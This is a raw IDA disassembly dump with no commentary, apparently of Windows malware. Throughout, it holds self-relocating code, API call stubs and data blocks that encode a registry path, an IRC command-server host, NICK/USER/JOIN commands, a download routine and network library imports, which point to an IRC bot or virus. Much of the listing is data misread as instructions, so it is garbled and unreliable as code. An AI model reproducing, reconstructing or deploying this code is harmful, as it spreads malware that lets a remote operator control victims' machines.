loc_41F708: ; CODE XREF: sub_41F5AF+110�j
db 65h
jb short near ptr loc_41F77C+2
imul ebp, [edi+6Eh], 417845h
inc edi
db 65h
jz short near ptr loc_41F76B+1
outsd
insb
jnz short near ptr loc_41F781+6
loc_41F71A: ; CODE XREF: sub_41F5AF:loc_41F6CB�j
db 65h
dec ecx
outsb
outsw
jb short near ptr loc_41F78C+2
popa
jz short near ptr loc_41F78C+1
outsd
outsb
inc ecx
loc_41F727: ; CODE XREF: sub_41F5AF:loc_41F6E1�j
add [edi+ebp*2+61h], cl
db 64h
dec esp
loc_41F72D: ; CODE XREF: sub_41F5AF+12E�j
imul esp, [edx+72h], 41797261h
add [ebp+61h], cl
jo short loc_41F78F
loc_41F739: ; CODE XREF: sub_41F5AF+120�j
imul esp, [ebp+77h], 6946664Fh
insb
loc_41F741: ; CODE XREF: sub_41F5AF+13F�j
; sub_41F5AF:loc_41F6F2�j
add gs:[edi+70h], cl
outs dx, byte ptr gs:[esi]
inc esi
imul ebp, [ebp+4Dh], 69707061h
outsb
db 67h
inc ecx
loc_41F753: ; CODE XREF: sub_41F5AF:loc_41F6FB�j
add [edi+70h], cl
outs dx, byte ptr gs:[esi]
push eax
jb short near ptr loc_41F7C9+1
arpl [ebp+73h], sp
loc_41F75E: ; CODE XREF: sub_41F5AF+146�j
jnb short $+2
push eax
jb short loc_41F7D2
arpl [ebp+73h], sp
jnb short near ptr loc_41F794+7
xor al, [esi+69h]
loc_41F76B: ; CODE XREF: sub_41F5AF+164�j
jb short near ptr loc_41F7DA+6
jz short $+2
push eax
jb short near ptr loc_41F7DA+7
loc_41F772: ; CODE XREF: sub_41F5AF+14E�j
arpl [ebp+73h], sp
jnb short near ptr loc_41F7A9+1
xor cl, [esi+65h]
js short near ptr loc_41F7EC+4
loc_41F77C: ; CODE XREF: sub_41F5AF:loc_41F708�j
add [ebx+65h], dl
jz short near ptr loc_41F7C5+2
loc_41F781: ; CODE XREF: sub_41F5AF+169�j
imul ebp, [ebp+41h], 69727474h
bound esi, [ebp+74h]
loc_41F78C: ; CODE XREF: sub_41F5AF+173�j
; sub_41F5AF+170�j
db 65h
jnb short loc_41F7D0
loc_41F78F: ; CODE XREF: sub_41F5AF+188�j
add [ebx+65h], dl
jz short loc_41F7DA
loc_41F794: ; CODE XREF: sub_41F5AF+1B7�j
imul ebp, [ebp+54h], 656D69h
push ebx
insb
db 65h, 65h
jo short $+4
push ebx
jns short loc_41F818
jz short loc_41F80C
insd
push esp
loc_41F7A9: ; CODE XREF: sub_41F5AF+1C6�j
imul ebp, [ebp+65h], 69466F54h
insb
db 65h
push esp
imul ebp, [ebp+65h], 6D6E5500h
popa
jo short loc_41F813
imul esp, [ebp+77h], 6946664Fh
insb
loc_41F7C5: ; CODE XREF: sub_41F5AF+1D0�j
add gs:[esi+69h], dl
loc_41F7C9: ; CODE XREF: sub_41F5AF+1AA�j
jb short near ptr loc_41F83E+1
jnz short loc_41F82E
insb
inc ecx
insb
loc_41F7D0: ; CODE XREF: sub_41F5AF:loc_41F78C�j
insb
outsd
loc_41F7D2: ; CODE XREF: sub_41F5AF+1B2�j
arpl [eax], ax
push edi
jb short loc_41F840
jz short loc_41F83E
inc esi
loc_41F7DA: ; CODE XREF: sub_41F5AF+1E3�j
; sub_41F5AF:loc_41F76B�j ...
imul ebp, [ebp+0], 6441744Eh
push 75h
jnb short loc_41F85A
push eax
jb short near ptr loc_41F84F+3
jbe short near ptr loc_41F84F+5
insb
loc_41F7EC: ; CODE XREF: sub_41F5AF+1CB�j
db 65h, 67h, 65h
jnb near ptr 0F845h
outsd
imul esp, [ebp+6Eh], 0
dec esi
jz short near ptr loc_41F83B+1
jb short near ptr loc_41F85F+1
popa
jz short loc_41F863
inc esi
imul ebp, [ebp+0], 7243744Eh
db 65h
popa
jz short loc_41F870
push eax
loc_41F80C: ; CODE XREF: sub_41F5AF+1F6�j
jb short loc_41F87D
arpl [ebp+73h], sp
jnb short $+2
loc_41F813: ; CODE XREF: sub_41F5AF+20C�j
dec esi
jz short near ptr loc_41F856+3
jb short loc_41F87D
loc_41F818: ; CODE XREF: sub_41F5AF+1F4�j
popa
jz short loc_41F880
push eax
jb short loc_41F88D
arpl [ebp+73h], sp
jnb short near ptr loc_41F863+5
js short $+2
dec esi
jz short loc_41F86B
jb short loc_41F88F
popa
jz short near ptr loc_41F88F+3
push ebx
loc_41F82E: ; CODE XREF: sub_41F5AF+21C�j
arpl gs:[ecx+ebp*2+6Fh], si
outsb
add [esi+74h], cl
inc ebx
jb short near ptr loc_41F89E+1
popa
loc_41F83B: ; CODE XREF: sub_41F5AF+248�j
jz short loc_41F8A2
push ebp
loc_41F83E: ; CODE XREF: sub_41F5AF+228�j
; sub_41F5AF:loc_41F7C9�j
jnb short near ptr loc_41F8A4+1
loc_41F840: ; CODE XREF: sub_41F5AF+226�j
jb short near ptr loc_41F88F+3
jb short loc_41F8B3
arpl [ebp+73h], sp
jnb short $+2
dec esi
jz short loc_41F899
popa
jo short near ptr loc_41F8A4+1
loc_41F84F: ; CODE XREF: sub_41F5AF+238�j
; sub_41F5AF+23A�j
imul esp, [ebp+77h], 6553664Fh
loc_41F856: ; CODE XREF: sub_41F5AF+265�j
arpl [ecx+ebp*2+6Fh], si
loc_41F85A: ; CODE XREF: sub_41F5AF+235�j
outsb
add [esi+74h], cl
dec edi
loc_41F85F: ; CODE XREF: sub_41F5AF+24A�j
jo short loc_41F8C6
outsb
inc esi
loc_41F863: ; CODE XREF: sub_41F5AF+24D�j
; sub_41F5AF+272�j
imul ebp, [ebp+0], 704F744Eh
loc_41F86B: ; CODE XREF: sub_41F5AF+277�j
outs dx, byte ptr gs:[esi]
push eax
jb short loc_41F8DF
loc_41F870: ; CODE XREF: sub_41F5AF+25A�j
arpl [ebp+73h], sp
jnb short loc_41F8C9
outsd
imul esp, [ebp+6Eh], 0
dec esi
jz short near ptr loc_41F8CB+1
loc_41F87D: ; CODE XREF: sub_41F5AF:loc_41F80C�j
; sub_41F5AF+267�j
jo short near ptr loc_41F8E3+1
outsb
loc_41F880: ; CODE XREF: sub_41F5AF+26A�j
push ebx
arpl gs:[ecx+ebp*2+6Fh], si
outsb
add [esi+74h], cl
push eax
jb short near ptr loc_41F8FB+1
loc_41F88D: ; CODE XREF: sub_41F5AF+26D�j
jz short near ptr loc_41F8F3+1
loc_41F88F: ; CODE XREF: sub_41F5AF+279�j
; sub_41F5AF+27C�j ...
arpl [esi+edx*2+69h], si
jb short loc_41F909
jnz short near ptr loc_41F8F7+1
insb
dec ebp
loc_41F899: ; CODE XREF: sub_41F5AF+29B�j
db 65h
insd
outsd
jb short near ptr loc_41F914+3
loc_41F89E: ; CODE XREF: sub_41F5AF+289�j
add [esi+74h], cl
push ecx
loc_41F8A2: ; CODE XREF: sub_41F5AF:loc_41F83B�j
jnz short loc_41F909
loc_41F8A4: ; CODE XREF: sub_41F5AF:loc_41F83E�j
; sub_41F5AF+29E�j
jb short near ptr loc_41F91E+1
dec ecx
outsb
outsw
jb short near ptr loc_41F918+1
popa
jz short loc_41F918
outsd
outsb
push esp
outsd
loc_41F8B3: ; CODE XREF: sub_41F5AF+293�j
imul esp, [ebp+6Eh], 0
dec esi
jz short near ptr loc_41F90F+2
jb short loc_41F925
jz short near ptr loc_41F922+1
push esi
imul esi, [edx+74h], 4D6C6175h
loc_41F8C6: ; CODE XREF: sub_41F5AF:loc_41F85F�j
db 65h
insd
outsd
loc_41F8C9: ; CODE XREF: sub_41F5AF+2C4�j
jb short loc_41F944
loc_41F8CB: ; CODE XREF: sub_41F5AF+2CC�j
add [edx+74h], dl
insb
push ebp
outsb
imul esp, [ebx+6Fh], 74536564h
jb short near ptr loc_41F941+2
outsb
db 67h
push esp
outsd
inc ecx
loc_41F8DF: ; CODE XREF: sub_41F5AF+2BF�j
outsb
jnb short near ptr loc_41F94A+1
push ebx
loc_41F8E3: ; CODE XREF: sub_41F5AF:loc_41F87D�j
jz short loc_41F957
imul ebp, [esi+67h], 41535700h
push ebx
jz short loc_41F950
jb short loc_41F965
jnz short near ptr loc_41F962+1
loc_41F8F3: ; CODE XREF: sub_41F5AF:loc_41F88D�j
add [ebx+6Ch], ah
outsd
loc_41F8F7: ; CODE XREF: sub_41F5AF+2E6�j
jnb short loc_41F95E
jnb short near ptr loc_41F969+1
loc_41F8FB: ; CODE XREF: sub_41F5AF+2DC�j
arpl [ebx+65h], bp
jz short $+2
arpl [edi+6Eh], bp
outsb
arpl gs:[eax+eax+67h], si
loc_41F909: ; CODE XREF: sub_41F5AF+2E4�j
; sub_41F5AF:loc_41F8A2�j
db 65h
jz short near ptr loc_41F973+1
outsd
jnb short near ptr loc_41F981+2
loc_41F90F: ; CODE XREF: sub_41F5AF+309�j
bound edi, [ecx+6Eh]
popa
insd
loc_41F914: ; CODE XREF: sub_41F5AF+2ED�j
add gs:[edx+65h], dh
loc_41F918: ; CODE XREF: sub_41F5AF+2FE�j
; sub_41F5AF+2FB�j
arpl [esi+0], si
jnb short near ptr loc_41F981+1
outsb
loc_41F91E: ; CODE XREF: sub_41F5AF:loc_41F8A4�j
add fs:[ebx+6Fh], dh
loc_41F922: ; CODE XREF: sub_41F5AF+30D�j
arpl [ebx+65h], bp
loc_41F925: ; CODE XREF: sub_41F5AF+30B�j
jz short $+2
dec ecx
outsb
jz short loc_41F990
jb short loc_41F99B
db 65h
jz short loc_41F973
insb
outsd
jnb short near ptr loc_41F998+1
dec eax
popa
outsb
db 64h
insb
add gs:[ecx+6Eh], cl
jz short loc_41F9A4
jb short near ptr loc_41F9AE+1
loc_41F941: ; CODE XREF: sub_41F5AF+329�j
db 65h
jz short loc_41F98B
loc_41F944: ; CODE XREF: sub_41F5AF:loc_41F8C9�j
db 65h
jz short loc_41F98A
outsd
outsb
outsb
loc_41F94A: ; CODE XREF: sub_41F5AF+331�j
arpl gs:[ebp+64h], si
push ebx
loc_41F950: ; CODE XREF: sub_41F5AF+33E�j
jz short near ptr loc_41F9B2+1
jz short loc_41F9B9
add [ecx+6Eh], cl
loc_41F957: ; CODE XREF: sub_41F5AF:loc_41F8E3�j
jz short near ptr loc_41F9BC+2
jb short loc_41F9C9
db 65h
jz short near ptr loc_41F9AB+2
loc_41F95E: ; CODE XREF: sub_41F5AF:loc_41F8F7�j
jo short loc_41F9C5
outsb
inc ecx
loc_41F962: ; CODE XREF: sub_41F5AF+342�j
add [ecx+6Eh], cl
loc_41F965: ; CODE XREF: sub_41F5AF+340�j
jz short near ptr loc_41F9CB+1
jb short loc_41F9D7
loc_41F969: ; CODE XREF: sub_41F5AF+34A�j
db 65h
jz short near ptr loc_41F9BA+1
jo short loc_41F9D3
outsb
push ebp
jb short near ptr loc_41F9DC+2
inc ecx
loc_41F973: ; CODE XREF: sub_41F5AF+37E�j
; sub_41F5AF:loc_41F909�j
add [ecx+6Eh], cl
jz short near ptr loc_41F9DC+1
jb short loc_41F9E8
db 65h
jz short near ptr loc_41F9CE+1
db 65h
popa
db 64h
inc esi
loc_41F981: ; CODE XREF: sub_41F5AF+36C�j
; sub_41F5AF+35E�j
imul ebp, [ebp+0], 41564441h
push eax
loc_41F98A: ; CODE XREF: sub_41F5AF:loc_41F944�j
dec ecx
loc_41F98B: ; CODE XREF: sub_41F5AF:loc_41F941�j
xor esi, [edx]
db 2Eh
inc esp
dec esp
loc_41F990: ; CODE XREF: sub_41F5AF+37A�j
dec esp
add [edx+65h], dl
db 67h
inc ebx
insb
outsd
loc_41F998: ; CODE XREF: sub_41F5AF+383�j
jnb short near ptr loc_41F9FD+2
dec ebx
loc_41F99B: ; CODE XREF: sub_41F5AF+37C�j
db 65h
jns short $+3
push edx
db 65h, 67h
dec edi
jo short loc_41FA09
loc_41F9A4: ; CODE XREF: sub_41F5AF+38E�j
outsb
dec ebx
db 65h
jns short near ptr loc_41F9EC+2
js short loc_41F9EC
loc_41F9AB: ; CODE XREF: sub_41F5AF+3AC�j
add [edx+65h], dl
loc_41F9AE: ; CODE XREF: sub_41F5AF+390�j
db 67h
push ecx
jnz short loc_41FA17
loc_41F9B2: ; CODE XREF: sub_41F5AF:loc_41F950�j
jb short near ptr loc_41FA2C+1
push esi
popa
insb
jnz short near ptr loc_41FA1D+1
loc_41F9B9: ; CODE XREF: sub_41F5AF+3A3�j
inc ebp
loc_41F9BA: ; CODE XREF: sub_41F5AF:loc_41F969�j
js short loc_41F9FD
loc_41F9BC: ; CODE XREF: sub_41F5AF:loc_41F957�j
add [edx+65h], dl
db 67h
push ebx
db 65h
jz short loc_41FA1A
popa
loc_41F9C5: ; CODE XREF: sub_41F5AF:loc_41F95E�j
insb
jnz short near ptr loc_41FA2C+1
inc ebp
loc_41F9C9: ; CODE XREF: sub_41F5AF+3AA�j
js short loc_41FA0C
loc_41F9CB: ; CODE XREF: sub_41F5AF:loc_41F965�j
add [esi+33h], dl
loc_41F9CE: ; CODE XREF: sub_41F5AF+3CB�j
imul byte ptr [edx+2]
push esi
push esi
loc_41F9D3: ; CODE XREF: sub_41F5AF+3BD�j
mov edx, esp
push 1
loc_41F9D7: ; CODE XREF: sub_41F5AF+3B8�j
push edx
push dword ptr [edx+18h]
push esi
loc_41F9DC: ; CODE XREF: sub_41F5AF+3C7�j
; sub_41F5AF+3C1�j
call dword ptr [ebp+10428Ch]
mov eax, esp
push esi
push esi
push esi
push eax
loc_41F9E8: ; CODE XREF: sub_41F5AF+3C9�j
push esi
push dword ptr [eax+18h]
loc_41F9EC: ; CODE XREF: sub_41F5AF+3FA�j
; sub_41F5AF+3F7�j
call dword ptr [ebp+103EFAh]
add esp, 10h
pop esi
retn 8
; END OF FUNCTION CHUNK FOR sub_41F5AF
; ---------------------------------------------------------------------------
db 8Dh ;
db 49h ; I
db 0FBh ; û
db 2Bh ; +
; ---------------------------------------------------------------------------
loc_41F9FD: ; CODE XREF: sub_41F5AF:loc_41F9BA�j
; sub_41F5AF:loc_41F998�j
enter 6851h, 0
; ---------------------------------------------------------------------------
db 0
db 0
db 0E8h ; è
db 8Dh ;
db 4Ch ; L
db 24h ; $
db 3
db 6Ah ; j
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41F5AF
loc_41FA09: ; CODE XREF: sub_41F5AF+3F3�j
add [edx+5], ch
loc_41FA0C: ; CODE XREF: sub_41F5AF:loc_41F9C9�j
push ecx
push eax
push ebx
push 5
mov ecx, esp
push eax
mov edx, esp
push eax
loc_41FA17: ; CODE XREF: sub_41F5AF+401�j
push esp
push 40h
loc_41FA1A: ; CODE XREF: sub_41F5AF+412�j
push ecx
push edx
push ebx
loc_41FA1D: ; CODE XREF: sub_41F5AF+408�j
call dword ptr [ebp+103F22h]
add esp, 0Ch
call dword ptr [ebp+103F2Ah]
loc_41FA2C: ; CODE XREF: sub_41F5AF:loc_41F9B2�j
; sub_41F5AF+417�j
add esp, 8
retn
; END OF FUNCTION CHUNK FOR sub_41F5AF
; ---------------------------------------------------------------------------
db 8Dh ;
db 95h ; •
db 30h ; 0
db 3Eh ; >
db 10h
db 0
db 33h ; 3
db 0C9h ; É
db 6Ah ; j
db 0
db 52h ; R
db 68h ; h
db 30h ; 0
db 0
db 32h ; 2
db 0
db 8Bh ; ‹
db 0C4h ; Ä
db 51h ; Q
db 51h ; Q
db 6Ah ; j
db 40h ; @
db 50h ; P
db 51h ; Q
db 6Ah ; j
db 18h
db 83h ; ƒ
db 0C0h ; À
db 8
db 54h ; T
db 6Ah ; j
db 0Eh
db 50h ; P
db 0FFh
db 95h ; •
db 1Eh
db 3Fh ; ?
db 10h
db 0
db 83h ; ƒ
db 0C4h ; Ä
db 20h
db 33h ; 3
db 0D2h ; Ò
db 85h ; …
db 0C0h ; À
db 0Fh
db 99h ; ™
db 0C2h ; Â
db 0F7h ; ÷
db 0DAh ; Ú
db 58h ; X
db 23h ; #
db 0C2h ; Â
db 0C3h ; Ã
db 57h ; W
db 33h ; 3
db 0FFh
db 0E8h ; è
db 0C1h ; Á
db 0FFh
db 0FFh
db 0FFh
db 0Fh
db 84h ; „
db 0A5h ; ¥
db 0
db 0
db 0
db 50h ; P
db 68h ; h
db 28h ; (
db 73h ; s
db 0
db 0
db 8Bh ; ‹
db 0D4h ; Ô
db 6Ah ; j
db 0
db 8Bh ; ‹
db 0CCh ; Ì
db 6Ah ; j
db 40h ; @
db 68h ; h
db 0
db 0
db 10h
db 0
db 6Ah ; j
db 2
db 52h ; R
db 6Ah ; j
db 0
db 68h ; h
db 28h ; (
db 73h ; s
db 0
db 0
db 6Ah ; j
db 0
db 51h ; Q
db 53h ; S
db 50h ; P
db 0FFh
db 95h ; •
db 12h
db 3Fh ; ?
db 10h
db 0
db 5Fh ; _
db 59h ; Y
db 0FFh
db 95h ; •
db 62h ; b
db 3Eh ; >
db 10h
db 0
db 85h ; …
db 0FFh
db 74h ; t
db 71h ; q
db 8Bh ; ‹
db 8Dh ;
db 90h ;
db 15h
db 10h
db 0
db 0E3h ; ã
db 0Ch
db 8Dh ;
db 95h ; •
db 0
db 10h
db 10h
db 0
db 3
db 0D1h ; Ñ
db 57h ; W
db 53h ; S
db 0FFh
db 0D2h ; Ò
db 8Bh ; ‹
db 85h ; …
db 0FEh ; þ
db 3Eh ; >
db 10h
db 0
db 8Dh ;
db 8Fh ;
db 16h
db 29h ; )
db 0
db 0
db 0E8h ; è
db 2Bh ; +
db 0FFh
db 0FFh
db 0FFh
db 8Bh ; ‹
db 85h ; …
db 16h
db 3Fh ; ?
db 10h
db 0
db 8Dh ;
db 8Fh ;
db 63h ; c
db 29h ; )
db 0
db 0
db 0E8h ; è
db 1Ah
db 0FFh
db 0FFh
db 0FFh
db 8Bh ; ‹
db 85h ; …
db 2
db 3Fh ; ?
db 10h
db 0
db 8Dh ;
db 8Fh ;
db 6Ah ; j
db 29h ; )
db 0
db 0
db 0E8h ; è
db 9
db 0FFh
db 0FFh
db 0FFh
db 8Bh ; ‹
db 85h ; …
db 6
db 3Fh ; ?
db 10h
db 0
db 85h ; …
db 0C0h ; À
db 74h ; t
db 20h
db 8Dh ;
db 8Fh ;
db 77h ; w
db 29h ; )
db 0
db 0
db 0E8h ; è
db 0F4h ; ô
db 0FEh ; þ
db 0FFh
db 0FFh
db 8Bh ; ‹
db 85h ; …
db 0Eh
db 3Fh ; ?
db 10h
db 0
db 85h ; …
db 0C0h ; À
db 74h ; t
db 0Bh
db 8Dh ;
db 8Fh ;
db 84h ; „
db 29h ; )
db 0
db 0
db 0E8h ; è
db 0DFh ; ß
db 0FEh ; þ
db 0FFh
db 0FFh
db 8Bh ; ‹
db 0C7h ; Ç
db 5Fh ; _
db 0C3h ; Ã
db 55h ; U
db 0E8h ; è
db 0
db 0
db 0
db 0
; ---------------------------------------------------------------------------
pop ebp
sub ebp, 101B24h
xor ecx, ecx
lea eax, [ebp+101EAFh]
push ecx
push esp
push ecx
push ecx
push eax
push ecx
push ecx
call dword ptr [ebp+103E8Eh]
xchg eax, [esp]
call dword ptr [ebp+103E62h]
pop ebp
retn 4
; ---------------------------------------------------------------------------
db 55h, 0E8h, 0
dword_41FB50 dd 5D000000h, 1B53ED81h, 0FF6A0010h, 1B1E958Dh, 52500010h
dd 2420CDh, 0C483002Ah, 85C7660Ch, 101B64h, 85C720CDh
dd 101B66h, 2A0024h, 1A6AC35Dh, 9E858h, 428D0000h, 0C9FEAA61h
dd 69C3F075h, 103F7C95h, 8840500h, 95894208h, 103F7Ch
dd 55C3E2F7h, 0E8h, 0ED815D00h, 101BADh, 3F809D8Bh, 7C830010h
dd 0F000824h, 0B984h, 8EC8100h, 54000002h, 10468h, 0B695FF00h
dd 8B00103Eh, 24848DFCh, 104h, 0E8006A50h, 4, 525256h
dd 0B295FF57h, 3300103Eh, 4978DC9h, 51000001h, 51026A51h
dd 68016Ah, 52400000h, 3E7E95FFh, 85960010h, 505B74F6h
dd 1046854h, 0FF570000h, 22024B4h, 95FF0000h, 103F5Eh
dd 74C08559h, 5014E316h, 6AD48Bh, 56575152h, 3EF695FFh
dd 85590010h, 56D075C0h, 3E6295FFh, 578D0010h, 6A575244h
dd 978D5844h, 104h, 6AC033ABh, 0ABF35910h, 50505050h, 52505050h
dd 3E8695FFh, 0C4810010h, 208h, 82474FFh, 3F4E95FFh, 0FF530010h
dd 103F4E95h, 4C25D00h, 0A3E8000h, 8B460175h, 10158C8Dh
dd 8D19E300h, 10100095h, 56D10300h, 0C084D2FFh, 11F880Fh
dd 840F0000h, 110h, 753A3E80h, 3E804610h, 1840F00h, 80000001h
dd 0F175203Eh, 503E8146h, 75474E49h, 0C6CF8B42h, 2B4F0146h
dd 6A51CEh, 0FF535651h, 103F4695h, 0C13B5900h, 0DF850Fh
dd 858D0000h, 101EA3h, 0C68006Ah, 50000000h, 4695FF53h
dd 3D00103Fh, 0Ch, 0BF850Fh, 0B1E90000h, 81000000h, 4952503Eh
dd 0A5850F56h, 83000000h, 3CAC08C6h, 99840F0Dh, 3C000000h
dd 0ACF37520h, 850F3A3Ch, 8Ch, 20200DADh, 213D2020h, 75746567h
dd 203CAC7Fh, 7E817C75h, 746820FFh, 81717574h, 3A70037Eh
dd 68752F2Fh, 0FF47C6h, 10BA310Fh, 0F7000027h, 95FF52E2h
dd 103EE6h, 5050C033h, 9E85050h, 44000000h, 6C6E776Fh
dd 64616Fh, 3F5695FFh, 0C0850010h, 0C9333674h, 3F808589h
dd 68510010h, 80000200h, 50565151h, 3F5A95FFh, 958D0010h
dd 101BA7h, 54C93350h, 51525051h, 8E95FF51h, 8700103Eh
dd 95FF2404h, 103E62h, 8D80C3F8h, 10157Fh, 6AC3F901h, 0FF016A01h
dd 473FF33h, 0C08515FFh, 0DB335A74h, 0BB3D08Bh, 8D3C5003h
dd 101DCBB5h, 0CBA8B00h, 8B000001h, 1088Ah, 2BF80300h
dd 0CB8B60CBh, 7461A6F3h, 0F5E24705h, 0C7832EEBh, 0CC8B530Fh
dd 50D48B57h, 51406A54h, 0FFFF6A52h, 103F2295h, 968D8B00h
dd 8300103Eh, 0CF2B0CC4h, 0C707E983h, 0E8006A07h, 34F8900h
dd 464F53C3h, 52415754h, 694D5C45h, 736F7263h, 5C74666Fh
dd 646E6957h, 5C73776Fh, 72727543h, 56746E65h, 69737265h
dd 455C6E6Fh, 6F6C7078h, 726572h, 67726154h, 6F487465h
dd 2007473h, 73500000h, 7079027Eh, 69786F72h, 72692E6Dh
dd 6C616763h, 2E797861h, 4E006C70h, 204B4349h, 73766A61h
dd 74756272h, 4553550Ah, 4A732052h, 204E494Fh, 72697626h
dd 550A7574h, 0E8h, 0ED815D00h, 101EB5h, 157F85C6h, 0FF000010h
dd 103EBA95h, 1FE8C100h, 1E6A3C74h, 3E72B58Bh, 0AC590010h
dd 2A752E3Ch, 0FF3E8166h, 8D23751Dh, 103F76BDh, 2768B00h
dd 0A566A557h, 38EC858Dh, 858F0010h, 103912h, 0FA4689FAh
dd 0FBFE4E8Ch, 0CFE201B1h, 21E850EBh, 83FFFFFBh, 408247Ch
dd 8E84475h, 53000000h, 442E4346h, 0FF004C4Ch, 103EC695h
dd 74C00B00h, 26A930Dh, 6E95FF53h, 0FF00103Eh, 97E893D0h
dd 0E8FFFFFEh, 0Bh, 5F434653h, 442E534Fh, 0FF004C4Ch, 103EC695h
dd 0FE7CE800h, 0E8FFFFh, 0FFFFFFF6h, 1012D48Dh, 8DC93300h
dd 10432485h, 51515100h, 51515051h, 0C295FF51h, 0E800103Eh
dd 0Bh, 52455355h, 442E3233h, 0FF004C4Ch, 103EC695h, 0AE800h
dd 73770000h, 6E697270h, 416674h, 6E95FF50h, 8900103Eh
dd 103E7685h, 8D310F00h, 1019858Dh, 7C858900h, 5100103Fh
dd 3EC695FFh, 68930010h, 4, 1992B58Dh, 8D590010h, 103F62BDh
dd 0F5C2E800h, 0C766FFFFh, 101E7585h, 83500000h, 101E77A5h
dd 958D0000h, 101E35h, 16A5450h, 6852006Ah, 80000002h
dd 3F6695FFh, 0C0850010h, 8D22755Ah, 101E688Dh, 66A5200h
dd 1E75B58Dh, 56540010h, 52515050h, 3F6A95FFh, 0FF580010h
dd 103F6295h, 8385C600h, 1041h, 0CE8h, 4F535700h, 32334B43h
dd 4C4C442Eh, 0C695FF00h, 9300103Eh, 768h, 0E9B58D00h
dd 59001018h, 3F32BD8Dh, 3DE80010h, 0E8FFFFF5h, 0Ch, 494E4957h
dd 2E54454Eh, 4C4C44h, 3EC695FFh, 0C0850010h, 235840Fh
dd 68930000h, 5, 1927B58Dh, 8D590010h, 103F4EBDh, 0F506E800h
dd 0BD83FFFFh, 103F52h, 10840F00h, 81000002h, 190ECh, 1685400h
dd 0FF000001h, 103F3295h, 90C48100h, 50000001h, 6AD48Bh
dd 5295FF52h, 8500103Fh, 0D7559C0h, 138868h, 0E695FF00h
dd 0EB00103Eh, 77BD83E2h, 101Eh, 858D2975h, 101E7Bh, 3E95FF50h
dd 8500103Fh, 89840FC0h, 8B000001h, 8B0C40h, 858F30FFh
dd 101E77h, 418385C6h, 6A010010h, 6A016A00h, 4A95FF02h
dd 8300103Fh, 840FFFF8h, 160h, 73958D93h, 6A00101Eh, 0FF535210h
dd 103F3A95h, 0FC08500h, 14085h, 94BD8D00h, 0B100101Eh
dd 0FA3CE808h, 9468FFFFh, 5E000000h, 3489E62Bh, 95FF5424h
dd 103EBEh, 1EA2BD8Dh, 1B10010h, 0FFFA1DE8h, 8F958DFFh
dd 6A00101Eh, 146800h, 53520000h, 3F4695FFh, 448D0010h
dd 958D1424h, 104324h, 0AB60F50h, 1424448Bh, 208E0C1h
dd 4A12014Ah, 34A1202h, 824440Bh, 0C10FE180h, 0B5108E0h
dd 0FF102444h, 0BD8D5032h, 103F84h, 1CE8h, 362E2500h, 202E2078h
dd 253A202Eh, 382E2525h, 20782578h, 4A0A7325h, 204E494Fh
dd 95FF5700h, 103E76h, 0ACC481h, 6A0000h, 0FF535750h, 103F4695h
dd 988D8B00h, 6A001015h, 6B1BE300h, 0E8510DC9h, 5, 0A642526h
dd 95FF5700h, 103E76h, 500CC483h, 7680BEBh, 8D000000h
dd 101EA8BDh, 0FF535700h, 103F4695h, 7EC08500h, 84B58D54h
dd 8300103Fh, 101598A5h, 8D8D0000h, 104183h, 6ACE2Bh, 0FF535651h
dd 103F4295h, 0F88300h, 8B912F7Eh, 84B58DFEh, 0B000103Fh
dd 75AEF20Dh, 2AE86010h, 61FFFFFAh, 9E31772h, 0EB01778Dh
dd 2BCF8BEAh, 84BD8DCEh, 0F300103Fh, 0EBF787A4h, 95FF53B9h
dd 103F36h, 157FBD80h, 74010010h, 7530682Ah, 95FF0000h
dd 103EE6h, 4183BD80h, 74000010h, 7785C711h, 101Eh, 0C6000000h
dd 10418385h, 8E90000h, 0C7FFFFFEh, 10158885h, 0
dd 4C25D80h, 4F0A0D00h, 6F6F6E20h, 666F206Eh, 66696C20h
dd 4F202165h, 6D697420h, 6F742065h, 6C656320h, 61726265h
dd 0D216574h, 2020200Ah, 204F2020h, 6D6D7573h, 67207265h
dd 65647261h, 0A0D216Eh, 656C6552h, 656C746Eh, 796C7373h
dd 70616820h, 61207970h, 6520646Eh, 63657078h, 746E6174h
dd 7473202Ch, 69646E61h, 203A676Eh, 570A0D2Dh, 68637461h
dd 20676E69h, 206C6C61h, 20796164h, 20646E61h, 6867696Eh
dd 66202C74h, 6620726Fh, 6E656972h, 49207364h, 69617720h
dd 0A0D3A74h, 72656857h, 72612065h, 6F792065h, 66202C75h
dd 6E656972h, 203F7364h, 656D6F43h, 74492021h, 20736920h
dd 656D6974h, 74492021h, 6C207327h, 21657461h, 30C78404h
dd 53AF69DFh, 10A61429h, 40375248h, 4A3BFDD0h, 40375232h
dd 6E232596h, 27B1FAE5h, 50B7AB4h, 57401CEAh, 6299AD47h
dd 1359931Ah, 3AAB5957h, 0F2A3088Ch, 53AF69C9h, 0B23C03F4h
dd 22A4A1EDh, 7E969BBCh, 10A61413h, 0D8B8B352h, 6F9F8055h
dd 0Ah dup(0)
dd 30A1F76Ah, 0F4A58360h, 1042h, 42F8A583h, 0F000010h
; CODE XREF: .rsrc:00420F2A�p
; .rsrc:00420F51�p ...
dd 8D1443B7h, 0B70F1853h, 0D003064Bh, 2424448Bh, 720C422Bh
dd 8423B19h, 428B1473h, 0C422B14h, 42F49589h, 85890010h
dd 1042F8h, 0C28305EBh, 61D9E228h, 880004C2h, 10246785h
dd 64E800h, 20680000h, 8D000000h, 10239485h, 18395900h
dd 0C0830C74h, 0FFF7E204h, 1042D085h, 0D9F7C300h, 24678D03h
dd 10E30010h, 8FFC70FFh, 4E88300h, 9D89F6E2h, 102394h
dd 74003A83h, 3322B05h, 4E8D1072h, 5E5B58FCh, 74003A83h
dd 0EB32FF04h, 1072FF03h, 0FFFF57E8h, 2BCE2BFFh, 1042F88Dh
dd 4B035800h, 858FC334h, 1042D4h, 42D085C7h, 10h, 3CE80000h
dd 8B000000h, 1042D085h, 0F6A9E800h, 18E8FFFFh, 83000000h
dd 1042D0BDh, 8750000h, 24109D89h, 9CEB0010h, 42D08DFFh
dd 8FC30010h, 1042D485h, 0D0958900h, 0E8001042h, 3, 8BC3C933h
dd 8093h, 0EDE85200h, 3FFFFFEh, 1042F895h, 83D60300h, 0F000C7Ah
dd 10784h, 107A8300h, 0FD840F00h, 8B000000h, 0E8500C42h
dd 0FFFFFEC8h, 42F88503h, 0C6030010h, 80088A50h, 197400F9h
dd 742EF980h, 0F1EB4003h, 8101488Bh, 0DFDFDFE1h, 44F981DFh
dd 75004C4Ch, 0C82B59ECh, 0FFAF983h, 0B78Fh, 78816600h
dd 0F3233FEh, 0AB85h, 3A835600h, 8B057500h, 2EB104Ah, 0F1030A8Bh
